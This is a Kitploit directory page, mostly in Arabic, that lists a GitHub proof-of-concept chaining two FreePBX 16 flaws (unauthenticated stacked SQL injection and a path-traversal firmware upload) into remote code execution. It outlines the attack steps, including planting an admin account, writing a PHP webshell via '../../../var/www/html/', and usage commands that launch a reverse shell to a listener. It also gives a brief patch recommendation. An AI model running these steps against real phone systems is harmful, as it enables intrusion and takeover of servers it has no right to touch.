Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2025-57819-RCE — CVE-2025-57819-RCE_PoC | Kitploit
أدوات/GitHubGitHub/teteren/cve-2025-57819-rce
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingPayload Development
GitHubteteren/cve-2025-57819-rce

CVE-2025-57819-RCE

CVE-2025-57819-RCE_PoC

عرض المستودع
منذ 19 أياملم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

FreePBX 16 — من SQLi غير مُصادق إلى RCE

الملخص: يشرح هذا الدليل كيفية الجمع بين ثغرتين في FreePBX 16 (CVE-2025-57819 و CVE-2025-61678) لبناء سلسلة هجوم كاملة تبدأ من الوصول غير المُصادق وصولًا إلى تنفيذ التعليمات البرمجية عن بُعد (Remote Code Execution, RCE).

معلومات ثغرات CVE

رقم CVEالمكوّن المتأثرالتأثير ونوع الثغرة
CVE-2025-57819مُحمّل وحدة Endpoint (وسيط brand)حقن SQL متعدد العبارات غير مُصادق (Unauthenticated Stacked SQL Injection)
CVE-2025-61678معالج رفع البرامج الثابتة في Endpoint Manager (وسيط fwbrand)رفع ملفات تعسفي مُصادق / اجتياز المسار (Path Traversal)

آلية الهجوم وخطواته

إنشاء حساب مسؤول (CVE-2025-57819)

يتم استغلال ثغرة حقن SQL متعدد العبارات غير المُصادق عبر مُحمّل وحدات مساحات الأسماء (Namespaced Endpoint Loader) لإدراج حساب مسؤول جديد بصلاحيات كاملة مباشرةً في جدول ampusers.

المصادقة (Authentication)

استخدام بيانات اعتماد المسؤول المُنشأة حديثًا لتسجيل الدخول إلى الواجهة الخلفية لإدارة FreePBX.

كتابة WebShell (CVE-2025-61678)

يتم إساءة استخدام ميزة رفع البرامج الثابتة في Endpoint Manager بالاستفادة من ثغرة اجتياز المسار في وسيط fwbrand (../../../var/www/html/

) لكتابة WebShell بلغة PHP مباشرةً في الجذر الرئيسي لموقع الويب.

تنفيذ الأوامر (Execution)

استدعاء WebShell المُنشر لتنفيذ أمر نظام واحد أو إنشاء Reverse Shell تفاعلي.

الإصدارات المتأثرة وتوصيات الإصلاح

الإصدارات المتأثرة:

  • FreePBX 16 (إصدارات وحدة Endpoint الأقل من 16.0.92)
  • FreePBX 17 (تم الإصلاح في الإصدارات الأقدم من 17.0.6)

توصية الإصلاح: يُرجى التحديث إلى أحدث إصدار مُصحح في أقرب وقت ممكن.

تعليمات الاستخدام (Usage)

root@kitploit:~
# 執行單一指令
python3 exploit.py --rhost pbx.example.com --command "id"

# 建立互動式 Reverse Shell (利用 pwntools 自動監聽)
python3 exploit.py --rhost pbx.example.com --lhost 10.0.0.5 --lport 4444

# 使用 Plain HTTP 與自訂通訊埠
python3 exploit.py --rhost pbx.example.com --http --rport 80 --command "uname -a"

وصف الخيارات (Options)

الخيارالوصف
--rhost[مطلوب] عنوان المضيف الهدف (Target Host)
--rportمنفذ الهدف (الافتراضي: 443)
--httpفرض استخدام HTTP بدلاً من HTTPS الافتراضي
تنزيل الأداة